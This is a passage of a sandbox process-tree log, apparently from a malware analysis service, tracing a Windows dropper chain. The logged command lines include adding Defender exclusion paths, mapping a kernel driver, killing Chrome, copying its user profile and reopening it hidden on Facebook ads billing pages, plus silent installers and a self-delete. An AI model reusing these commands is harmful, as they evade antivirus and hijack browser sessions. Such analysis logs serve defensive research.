C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1780,1120904390853685297,10639612336517740334,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3140 /prefetch:825⤵PID:9192
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1780,1120904390853685297,10639612336517740334,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5624 /prefetch:825⤵PID:7320
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1780,1120904390853685297,10639612336517740334,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3796 /prefetch:825⤵PID:5092
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1780,1120904390853685297,10639612336517740334,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7224 /prefetch:825⤵PID:580
-
-
-
-
-
-
C:\Windows\regedit.exeregedit /s chrome-set.reg21⤵
- Runs .reg file with regedit
PID:6672
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\parse.exeparse.exe -f json -b firefox21⤵PID:8248
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\parse.exeparse.exe -f json -b chrome21⤵PID:8876
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\parse.exeparse.exe -f json -b edge21⤵PID:2748
-
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\thzusnw3.j04\askinstall18.exe & exit18⤵PID:7724
-
C:\Users\Admin\AppData\Local\Temp\thzusnw3.j04\askinstall18.exeC:\Users\Admin\AppData\Local\Temp\thzusnw3.j04\askinstall18.exe19⤵PID:7844
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe20⤵PID:8004
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe21⤵
- Kills process with taskkill
PID:8088
-
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\fzxb2jmz.iyq\md7_7dfj.exe & exit18⤵PID:7308
-
C:\Users\Admin\AppData\Local\Temp\fzxb2jmz.iyq\md7_7dfj.exeC:\Users\Admin\AppData\Local\Temp\fzxb2jmz.iyq\md7_7dfj.exe19⤵PID:8564
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\rq1dpiaw.txt\privacytools5.exe & exit18⤵PID:8316
-
C:\Users\Admin\AppData\Local\Temp\rq1dpiaw.txt\privacytools5.exeC:\Users\Admin\AppData\Local\Temp\rq1dpiaw.txt\privacytools5.exe19⤵PID:8776
-
C:\Users\Admin\AppData\Local\Temp\rq1dpiaw.txt\privacytools5.exeC:\Users\Admin\AppData\Local\Temp\rq1dpiaw.txt\privacytools5.exe20⤵PID:9012
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\413qelza.hql\GcleanerWW.exe /mixone & exit18⤵PID:8680
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\4lt2xdhr.1ya\setup.exe /8-2222 & exit18⤵PID:8452
-
C:\Users\Admin\AppData\Local\Temp\4lt2xdhr.1ya\setup.exeC:\Users\Admin\AppData\Local\Temp\4lt2xdhr.1ya\setup.exe /8-222219⤵PID:9140
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Program Files (x86)\Wild-Wave"20⤵PID:7288
-
-
C:\Program Files (x86)\Wild-Wave\7za.exe"C:\Program Files (x86)\Wild-Wave\7za.exe" e -p154.61.71.51 winamp-plugins.7z20⤵PID:4984
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ""C:\Program Files (x86)\Wild-Wave\setup.exe" -map "C:\Program Files (x86)\Wild-Wave\WinmonProcessMonitor.sys""20⤵PID:8868
-
C:\Program Files (x86)\Wild-Wave\setup.exe"C:\Program Files (x86)\Wild-Wave\setup.exe" -map "C:\Program Files (x86)\Wild-Wave\WinmonProcessMonitor.sys"21⤵PID:6308
-
-
-
C:\Program Files (x86)\Wild-Wave\7za.exe"C:\Program Files (x86)\Wild-Wave\7za.exe" e -p154.61.71.51 winamp.7z20⤵PID:8064
-
-
C:\Program Files (x86)\Wild-Wave\setup.exe"C:\Program Files (x86)\Wild-Wave\setup.exe" /8-222220⤵PID:6196
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\pgupo5c5.kpt\MultitimerFour.exe & exit18⤵PID:9056
-
C:\Users\Admin\AppData\Local\Temp\pgupo5c5.kpt\MultitimerFour.exeC:\Users\Admin\AppData\Local\Temp\pgupo5c5.kpt\MultitimerFour.exe19⤵PID:7196
-
C:\Users\Admin\AppData\Local\Temp\32P9OUXXDE\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\32P9OUXXDE\multitimer.exe" 0 306033e7ac94ccd3.87625057 0 10420⤵PID:8884
-
C:\Users\Admin\AppData\Local\Temp\32P9OUXXDE\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\32P9OUXXDE\multitimer.exe" 1 3.1615299890.60478532305ce 10421⤵PID:6384
-
C:\Users\Admin\AppData\Local\Temp\32P9OUXXDE\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\32P9OUXXDE\multitimer.exe" 2 3.1615299890.60478532305ce22⤵PID:7316
-
C:\Users\Admin\AppData\Local\Temp\idqatohp4tt\chashepro3.exe"C:\Users\Admin\AppData\Local\Temp\idqatohp4tt\chashepro3.exe" /VERYSILENT23⤵PID:6444
-
C:\Users\Admin\AppData\Local\Temp\is-6N00C.tmp\chashepro3.tmp"C:\Users\Admin\AppData\Local\Temp\is-6N00C.tmp\chashepro3.tmp" /SL5="$305C4,1478410,58368,C:\Users\Admin\AppData\Local\Temp\idqatohp4tt\chashepro3.exe" /VERYSILENT24⤵PID:2424
-
-
-
C:\Users\Admin\AppData\Local\Temp\2vgqacsjhl4\Setup3310.exe"C:\Users\Admin\AppData\Local\Temp\2vgqacsjhl4\Setup3310.exe" /Verysilent /subid=57723⤵PID:6708
-
C:\Users\Admin\AppData\Local\Temp\is-233F8.tmp\Setup3310.tmp"C:\Users\Admin\AppData\Local\Temp\is-233F8.tmp\Setup3310.tmp" /SL5="$305C8,802346,56832,C:\Users\Admin\AppData\Local\Temp\2vgqacsjhl4\Setup3310.exe" /Verysilent /subid=57724⤵PID:6800
-
C:\Users\Admin\AppData\Local\Temp\is-ANRPP.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-ANRPP.tmp\Setup.exe" /Verysilent25⤵PID:8996
-
C:\Users\Admin\AppData\Local\Temp\is-FU4CL.tmp\Setup.tmp"C:\Users\Admin\AppData\Local\Temp\is-FU4CL.tmp\Setup.tmp" /SL5="$7027A,138429,56832,C:\Users\Admin\AppData\Local\Temp\is-ANRPP.tmp\Setup.exe" /Verysilent26⤵PID:4488
-
C:\Users\Admin\AppData\Local\Temp\is-3GSPO.tmp\PictureLAb.exe"C:\Users\Admin\AppData\Local\Temp\is-3GSPO.tmp\PictureLAb.exe" /Verysilent27⤵PID:6744
-
C:\Users\Admin\AppData\Local\Temp\is-6LEM9.tmp\PictureLAb.tmp"C:\Users\Admin\AppData\Local\Temp\is-6LEM9.tmp\PictureLAb.tmp" /SL5="$90394,1574549,56832,C:\Users\Admin\AppData\Local\Temp\is-3GSPO.tmp\PictureLAb.exe" /Verysilent28⤵PID:4304
-
C:\Users\Admin\AppData\Local\Temp\is-C0I7M.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-C0I7M.tmp\Setup.exe" /VERYSILENT29⤵PID:2108
-
C:\Users\Admin\AppData\Local\Temp\is-D778E.tmp\Setup.tmp"C:\Users\Admin\AppData\Local\Temp\is-D778E.tmp\Setup.tmp" /SL5="$404EA,298255,214528,C:\Users\Admin\AppData\Local\Temp\is-C0I7M.tmp\Setup.exe" /VERYSILENT30⤵PID:5224
-
C:\Users\Admin\AppData\Local\Temp\is-7TKN6.tmp\def.exe"C:\Users\Admin\AppData\Local\Temp\is-7TKN6.tmp\def.exe" /S /UID=lab21431⤵PID:6728
-
C:\Users\Admin\AppData\Local\Temp\a3-1981f-84c-6618f-2162ab6049d10\Faecygaeqaqi.exe"C:\Users\Admin\AppData\Local\Temp\a3-1981f-84c-6618f-2162ab6049d10\Faecygaeqaqi.exe"32⤵PID:4072
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\3zkpf1cl.5r3\lod.exe & exit33⤵PID:5844
-
C:\Users\Admin\AppData\Local\Temp\3zkpf1cl.5r3\lod.exeC:\Users\Admin\AppData\Local\Temp\3zkpf1cl.5r3\lod.exe34⤵PID:10860
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c echo HQxchYwhQ35⤵PID:11512
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c cmd < Riconobbe.xlt35⤵PID:11936
-
C:\Windows\SysWOW64\cmd.execmd36⤵PID:8388
-
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\o5mng0kf.gvf\customer4.exe & exit33⤵PID:11924
-
C:\Users\Admin\AppData\Local\Temp\o5mng0kf.gvf\customer4.exeC:\Users\Admin\AppData\Local\Temp\o5mng0kf.gvf\customer4.exe34⤵PID:11324
-
C:\Users\Admin\AppData\Local\Temp\RarSFX3\main.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX3\main.exe"35⤵PID:11612
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\nn445meo.0si\askinstall18.exe & exit33⤵PID:12260
-
C:\Users\Admin\AppData\Local\Temp\nn445meo.0si\askinstall18.exeC:\Users\Admin\AppData\Local\Temp\nn445meo.0si\askinstall18.exe34⤵PID:8664
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe35⤵PID:11612
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe36⤵
- Kills process with taskkill
PID:11684
-
-
-
C:\Windows\SysWOW64\xcopy.exexcopy "C:\Users\Admin\AppData\Local\Google\Chrome\User Data" "C:\Users\Admin\AppData\Local\Temp\mfhsghshee99\" /s /e /y35⤵PID:6576
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --window-position=-50000,-50000 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\mfhsghshee99" https://www.facebook.com/ https://www.facebook.com/pages/ https://secure.facebook.com/ads/manager/account_settings/account_billing/35⤵PID:6836
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Temp\mfhsghshee99 /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Temp\mfhsghshee99\Crashpad --metrics-dir=C:\Users\Admin\AppData\Local\Temp\mfhsghshee99 --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=86.0.4240.111 --initial-client-data=0xf0,0xf4,0xf8,0xcc,0xfc,0x7ffc9d706e00,0x7ffc9d706e10,0x7ffc9d706e2036⤵PID:8356
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1828,4606639272820536911,17158340124306933351,131072 --lang=en-US --service-sandbox-type=utility --user-data-dir="C:\Users\Admin\AppData\Local\Temp\mfhsghshee99" --mojo-platform-channel-handle=1900 /prefetch:836⤵PID:9692
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1828,4606639272820536911,17158340124306933351,131072 --lang=en-US --service-sandbox-type=network --user-data-dir="C:\Users\Admin\AppData\Local\Temp\mfhsghshee99" --mojo-platform-channel-handle=1888 /prefetch:836⤵PID:9684
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1828,4606639272820536911,17158340124306933351,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\mfhsghshee99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2860 /prefetch:136⤵PID:8668
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1828,4606639272820536911,17158340124306933351,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\mfhsghshee99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2848 /prefetch:136⤵PID:9748
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1828,4606639272820536911,17158340124306933351,131072 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\mfhsghshee99" --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1840 /prefetch:236⤵PID:9656
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1828,4606639272820536911,17158340124306933351,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\mfhsghshee99" --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3540 /prefetch:136⤵PID:12152
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1828,4606639272820536911,17158340124306933351,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\mfhsghshee99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3344 /prefetch:136⤵PID:12740
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1828,4606639272820536911,17158340124306933351,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\mfhsghshee99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3228 /prefetch:136⤵PID:2264
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1828,4606639272820536911,17158340124306933351,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\mfhsghshee99" --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3772 /prefetch:136⤵PID:9768
-
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\u0yysqp3.kdi\md7_7dfj.exe & exit33⤵PID:12600
-
C:\Users\Admin\AppData\Local\Temp\u0yysqp3.kdi\md7_7dfj.exeC:\Users\Admin\AppData\Local\Temp\u0yysqp3.kdi\md7_7dfj.exe34⤵PID:12948
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\udgzwqaf.msp\privacytools5.exe & exit33⤵PID:12332
-
C:\Users\Admin\AppData\Local\Temp\udgzwqaf.msp\privacytools5.exeC:\Users\Admin\AppData\Local\Temp\udgzwqaf.msp\privacytools5.exe34⤵PID:8456
-
C:\Users\Admin\AppData\Local\Temp\udgzwqaf.msp\privacytools5.exeC:\Users\Admin\AppData\Local\Temp\udgzwqaf.msp\privacytools5.exe35⤵PID:8428
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\duhgmp0f.oag\GcleanerWW.exe /mixone & exit33⤵PID:3252
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\votpn1qq.pe5\setup.exe /8-2222 & exit33⤵PID:7992
-
C:\Users\Admin\AppData\Local\Temp\votpn1qq.pe5\setup.exeC:\Users\Admin\AppData\Local\Temp\votpn1qq.pe5\setup.exe /8-222234⤵PID:5540
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Program Files (x86)\Proud-Forest"35⤵PID:8528
-
-
C:\Program Files (x86)\Proud-Forest\7za.exe"C:\Program Files (x86)\Proud-Forest\7za.exe" e -p154.61.71.51 winamp-plugins.7z35⤵PID:3820
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ""C:\Program Files (x86)\Proud-Forest\setup.exe" -map "C:\Program Files (x86)\Proud-Forest\WinmonProcessMonitor.sys""35⤵PID:10000
-
C:\Program Files (x86)\Proud-Forest\setup.exe"C:\Program Files (x86)\Proud-Forest\setup.exe" -map "C:\Program Files (x86)\Proud-Forest\WinmonProcessMonitor.sys"36⤵PID:4408
-
-
-
C:\Program Files (x86)\Proud-Forest\7za.exe"C:\Program Files (x86)\Proud-Forest\7za.exe" e -p154.61.71.51 winamp.7z35⤵PID:12036
-
-
C:\Program Files (x86)\Proud-Forest\setup.exe"C:\Program Files (x86)\Proud-Forest\setup.exe" /8-222235⤵PID:7444
-
C:\Program Files (x86)\Proud-Forest\setup.exe"C:\Program Files (x86)\Proud-Forest\setup.exe" /8-222236⤵PID:10296
-
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\afummzlp.3lm\MultitimerFour.exe & exit33⤵PID:8140
-
C:\Users\Admin\AppData\Local\Temp\afummzlp.3lm\MultitimerFour.exeC:\Users\Admin\AppData\Local\Temp\afummzlp.3lm\MultitimerFour.exe34⤵PID:8876
-
C:\Users\Admin\AppData\Local\Temp\Y63QTPGPGZ\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\Y63QTPGPGZ\multitimer.exe" 0 306033e7ac94ccd3.87625057 0 10435⤵PID:9792
-
C:\Users\Admin\AppData\Local\Temp\Y63QTPGPGZ\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\Y63QTPGPGZ\multitimer.exe" 1 3.1615300001.604785a108bff 10436⤵PID:12764
-
C:\Users\Admin\AppData\Local\Temp\Y63QTPGPGZ\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\Y63QTPGPGZ\multitimer.exe" 2 3.1615300001.604785a108bff37⤵PID:11580
-
C:\Users\Admin\AppData\Local\Temp\r1tltg1cqec\vict.exe"C:\Users\Admin\AppData\Local\Temp\r1tltg1cqec\vict.exe" /VERYSILENT /id=53538⤵PID:11176
-
C:\Users\Admin\AppData\Local\Temp\is-7RI92.tmp\vict.tmp"C:\Users\Admin\AppData\Local\Temp\is-7RI92.tmp\vict.tmp" /SL5="$60274,870426,780800,C:\Users\Admin\AppData\Local\Temp\r1tltg1cqec\vict.exe" /VERYSILENT /id=53539⤵PID:11552
-
C:\Users\Admin\AppData\Local\Temp\is-RM3JF.tmp\wimapi.exe"C:\Users\Admin\AppData\Local\Temp\is-RM3JF.tmp\wimapi.exe" 53540⤵PID:13028
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1jczc3rt2yn\askinstall24.exe"C:\Users\Admin\AppData\Local\Temp\1jczc3rt2yn\askinstall24.exe"38⤵PID:10408
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe39⤵PID:12404
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe40⤵
- Kills process with taskkill
PID:4524
-
-
-
C:\Windows\SysWOW64\xcopy.exexcopy "C:\Users\Admin\AppData\Local\Google\Chrome\User Data" "C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99\" /s /e /y39⤵PID:7668
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --window-position=-50000,-50000 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" https://www.facebook.com/ https://www.facebook.com/pages/ https://secure.facebook.com/ads/manager/account_settings/account_billing/39⤵PID:10212
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99 /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99\Crashpad --metrics-dir=C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99 --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=86.0.4240.111 --initial-client-data=0xec,0xf0,0xf4,0xc8,0xf8,0x7ffc9d706e00,0x7ffc9d706e10,0x7ffc9d706e2040⤵PID:10244
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1652,13899453489605434329,10473744346187597326,131072 --lang=en-US --service-sandbox-type=utility --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --mojo-platform-channel-handle=2088 /prefetch:840⤵PID:4028
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1652,13899453489605434329,10473744346187597326,131072 --lang=en-US --service-sandbox-type=network --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --mojo-platform-channel-handle=1760 /prefetch:840⤵PID:9856
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1652,13899453489605434329,10473744346187597326,131072 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1708 /prefetch:240⤵PID:9920
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1652,13899453489605434329,10473744346187597326,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2820 /prefetch:140⤵PID:3132
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1652,13899453489605434329,10473744346187597326,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2800 /prefetch:140⤵PID:8332
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1652,13899453489605434329,10473744346187597326,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3496 /prefetch:140⤵PID:10104
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1652,13899453489605434329,10473744346187597326,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3196 /prefetch:140⤵PID:10524
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1652,13899453489605434329,10473744346187597326,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3044 /prefetch:140⤵PID:10500
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1652,13899453489605434329,10473744346187597326,131072 --disable-gpu-compositing --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3780 /prefetch:140⤵PID:2096
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\uorvoecwqyx\wu5hdzfhwcg.exe"C:\Users\Admin\AppData\Local\Temp\uorvoecwqyx\wu5hdzfhwcg.exe" /ustwo INSTALL38⤵PID:5672
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "wu5hdzfhwcg.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\uorvoecwqyx\wu5hdzfhwcg.exe" & exit39⤵PID:5156
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "wu5hdzfhwcg.exe" /f40⤵
- Kills process with taskkill
PID:11796
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\acnvugo3gji\chashepro3.exe"C:\Users\Admin\AppData\Local\Temp\acnvugo3gji\chashepro3.exe" /VERYSILENT38⤵PID:11764
-
C:\Users\Admin\AppData\Local\Temp\is-D5JKS.tmp\chashepro3.tmp"C:\Users\Admin\AppData\Local\Temp\is-D5JKS.tmp\chashepro3.tmp" /SL5="$504EE,1478410,58368,C:\Users\Admin\AppData\Local\Temp\acnvugo3gji\chashepro3.exe" /VERYSILENT39⤵PID:11872
-
-
-
C:\Users\Admin\AppData\Local\Temp\fi0uevlmqsp\Setup3310.exe"C:\Users\Admin\AppData\Local\Temp\fi0uevlmqsp\Setup3310.exe" /Verysilent /subid=57738⤵PID:8572
-
C:\Users\Admin\AppData\Local\Temp\is-SBROM.tmp\Setup3310.tmp"C:\Users\Admin\AppData\Local\Temp\is-SBROM.tmp\Setup3310.tmp" /SL5="$904D2,802346,56832,C:\Users\Admin\AppData\Local\Temp\fi0uevlmqsp\Setup3310.exe" /Verysilent /subid=57739⤵PID:8540
-
C:\Users\Admin\AppData\Local\Temp\is-B6FCJ.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-B6FCJ.tmp\Setup.exe" /Verysilent40⤵PID:3216
-
C:\Users\Admin\AppData\Local\Temp\is-GBLMP.tmp\Setup.tmp"C:\Users\Admin\AppData\Local\Temp\is-GBLMP.tmp\Setup.tmp" /SL5="$504F2,138429,56832,C:\Users\Admin\AppData\Local\Temp\is-B6FCJ.tmp\Setup.exe" /Verysilent41⤵PID:11392
-
C:\Users\Admin\AppData\Local\Temp\is-ORE8V.tmp\PictureLAb.exe"C:\Users\Admin\AppData\Local\Temp\is-ORE8V.tmp\PictureLAb.exe" /Verysilent42⤵PID:12124
-
C:\Users\Admin\AppData\Local\Temp\is-LB5J2.tmp\PictureLAb.tmp"C:\Users\Admin\AppData\Local\Temp\is-LB5J2.tmp\PictureLAb.tmp" /SL5="$2079A,1574549,56832,C:\Users\Admin\AppData\Local\Temp\is-ORE8V.tmp\PictureLAb.exe" /Verysilent43⤵PID:11432
-
